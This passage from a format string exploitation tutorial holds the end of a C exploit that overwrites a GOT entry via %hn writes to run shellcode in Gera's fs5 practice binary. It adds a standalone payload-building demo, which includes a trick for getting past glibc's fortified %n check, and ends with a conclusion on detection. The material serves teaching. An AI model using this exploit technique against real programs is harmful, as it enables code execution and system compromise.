Insecure Programming Demonstrated: Format Strings (2)
2006-04-02 20:26:42 Source: WEB开发网
    /* Continued from part 1: the loop above probed up to 30 stack positions
       for the start of our buffer and left its index in i. */
    if (i == 30) {
        printf("Can't find our format string in stack.\n");
        printf("Some padding may be needed. Aborting...\n");
        exit(1);
    }

    /* Ask objdump for the victim's relocations and grep the GOT entry whose
       name contains "deregister"; the binary calls through that slot at exit,
       so overwriting it redirects control to the shellcode. */
    sprintf(temp_buffer, "%s -R %s | %s deregister", OBJDUMP, VICTIM, GREP);
    f = popen(temp_buffer, "r");
    if (f == NULL || fscanf(f, "%08x", &deregister_address) != 1) {
        if (f != NULL)
            pclose(f);
        printf("Error: Cannot find deregister address in GOT!\n");
        exit(1);
    }
    pclose(f);
    printf("_deregister address in GOT is: 0x%08x\n", deregister_address);
    printf("shellcode address in stack is: 0x%08x\n\n", ret);

    /* The 32-bit shellcode address is written as two 16-bit halves. */
    first_half  = (ret & 0xffff0000) >> 16;
    second_half = (ret & 0x0000ffff);

    /* Evil buffer construction: the two target addresses come first (bytes
       0-3 and 4-7 of the buffer), followed by two "%.<pad>d%<pos>$hn" pairs. */
    p = evil_buffer;
    bzero(p, sizeof(evil_buffer));

    /* first_half goes to GOT entry + 2, the high half on a little-endian target */
    *((void **)p) = (void *)(deregister_address + 2);
    p += 4;
    /* second_half goes to the GOT entry itself, the low half */
    *((void **)p) = (void *)(deregister_address);
    p += 4;

    /* "%%.%ud" expands to "%.<N>d". The 8 address bytes already printed plus
       first_half - 8 bytes of padding bring printf's byte counter to
       first_half, which "%<i+1>$hn" stores at the first address; another
       second_half - first_half bytes bring it to second_half, which
       "%<i+2>$hn" stores at the second. The counter only grows, so this
       construction requires second_half > first_half. */
    sprintf(p, "%%.%ud%%%d$hn" "%%.%ud%%%d$hn",
            first_half - 8, i + 1,
            second_half - first_half, i + 2);

    execle("/home/user/gera/fs5", "fs5", evil_buffer, NULL, env);
}
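The two %hn writes are the whole trick, so here is a stand-alone version of them as an added example (written for this edit, not code from the article, from Gera's exercises or from Core's paper). It builds the same payload shape and then performs the write through a real snprintf call into a local variable that stands in for the GOT entry. It assumes Linux/glibc on a little-endian CPU (the high half of the slot sits at +2, exactly as in the exploit above) and that a page-sized anonymous mmap is available. It goes one step beyond the page's code: it writes whichever half is numerically smaller first, because printf's byte counter can only grow, which is the case the exploit above cannot handle. The names build_halves_fmt, fmt_write32 and payload_buf are mine, and the sample values are constructed.

```c
#define _DEFAULT_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* Scratch buffer for payloads (global so callers can inspect the result). */
char payload_buf[128];

/*
 * Build the two-write payload "%1$.<a>d%2$hn%3$.<b>d%4$hn" that stores the
 * 32-bit VALUE into a slot as two 16-bit halves.  ALREADY_WRITTEN is the
 * number of bytes printf has emitted before the first %hn (8 in the exploit
 * above, for the two addresses at the front of the buffer).
 *
 * printf's byte counter only grows, so the smaller half is written first;
 * the exploit above always writes the high half first and so fails whenever
 * the low half of ret is the smaller one.  Returns 1 if arg 2 must point at
 * the HIGH half (high written first), 0 if arg 2 must point at the LOW half,
 * -1 if no payload can be built.  All four conversions are positional because
 * POSIX forbids mixing numbered and sequential conversions in one format.
 */
int build_halves_fmt(char *out, size_t outlen, uint32_t value,
                     unsigned already_written)
{
    unsigned hi = value >> 16, lo = value & 0xffff;
    int hi_first = hi <= lo;
    unsigned first  = hi_first ? hi : lo;
    unsigned second = hi_first ? lo : hi;

    if (first < already_written)
        return -1;
    int n = snprintf(out, outlen, "%%1$.%ud%%2$hn%%3$.%ud%%4$hn",
                     first - already_written, second - first);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return hi_first;
}

/*
 * Run the payload through a real printf-family call.  SLOT is a local that
 * stands in for the GOT entry; its high half is at +2 (little-endian
 * assumption).  Returns the slot's final contents, or 0 if no payload could
 * be built.
 */
uint32_t fmt_write32(uint32_t value)
{
    uint32_t slot = 0;
    uint16_t *hi_half = (uint16_t *)((char *)&slot + 2);
    uint16_t *lo_half = (uint16_t *)&slot;
    static char sink[0x10000 + 64];     /* the padding can reach 65535 bytes */
    const size_t len = 4096;

    /* glibc's _FORTIFY_SOURCE aborts on %n in a writable format string, and a
       runtime-built payload is exactly what that check targets, so the payload
       gets its own mapping which is made read-only before use (Linux/glibc
       assumption; harmless elsewhere). */
    char *fmt = mmap(NULL, len, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (fmt == MAP_FAILED)
        return 0;
    int hi_first = build_halves_fmt(fmt, len, value, 0);
    if (hi_first < 0 || mprotect(fmt, len, PROT_READ) != 0) {
        munmap(fmt, len);
        return 0;
    }
    /* Args 1 and 3 are the integers the padding conversions print (0 keeps the
       output exactly <precision> bytes long); args 2 and 4 are the two targets,
       ordered as build_halves_fmt decided. */
    if (hi_first)
        snprintf(sink, sizeof sink, fmt, 0, hi_half, 0, lo_half);
    else
        snprintf(sink, sizeof sink, fmt, 0, lo_half, 0, hi_half);
    munmap(fmt, len);
    return slot;
}

int main(void)
{
    uint32_t ret = 0xbffff9a0;   /* constructed: a stack address of the article's era */
    int hi_first = build_halves_fmt(payload_buf, sizeof payload_buf, ret, 8);
    printf("payload (%s half first): %s\n", hi_first ? "high" : "low", payload_buf);
    printf("slot after write: 0x%08x\n", fmt_write32(ret));
    printf("slot after write: 0x%08x\n", fmt_write32(0xbfff0010));  /* low half < high half */
    return 0;
}
```

The exploit on this page is the hi_first == 1 branch with already_written == 8; a value such as 0xbfff0010 takes the other branch and would have produced a wildly negative precision (cast to a huge unsigned) in the original construction. The mprotect step is also a reminder of why fortified glibc builds refuse %n in writable format strings: the very payloads this article builds.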
Conclusion
Format string vulnerabilities are comparatively easy to find: the telltale sign is a printf-family call whose format argument is not a string literal, such as printf(buf), which compilers can flag with -Wformat-security (buffer overflows, by contrast, can be hard to spot even in a careful source review). Automated tools are therefore usually effective at detecting them in code. Why, then, are format string bugs considered such a serious threat? Because they drew attention late, not until 2000. Careless programming left large numbers of format string bugs in many older daemons and applications, and they will inevitably keep causing security problems in the future.
References
1. Gera, "Insecure Programming by Example", http://community.core-sdi.com/~gera/InsecureProgramming/
2. scut, "Exploiting Format String Vulnerabilities", http://www.team-teso.net/releases/formatstring-1.2.tar.gz
3. Aleph One, "Smashing The Stack For Fun and Profit", Phrack 49, http://www.phrack.com/phrack/49/P49-14
4. Linux Programmer's Manual, snprintf(3), http://www.die.net/doc/linux/man/man3/snprintf.3.html
5. Core Security Team, "Vulnerabilities in your code – Advanced Buffer Overflows", http://www.core-sec.com/examples/core_vulnerabilities.pdf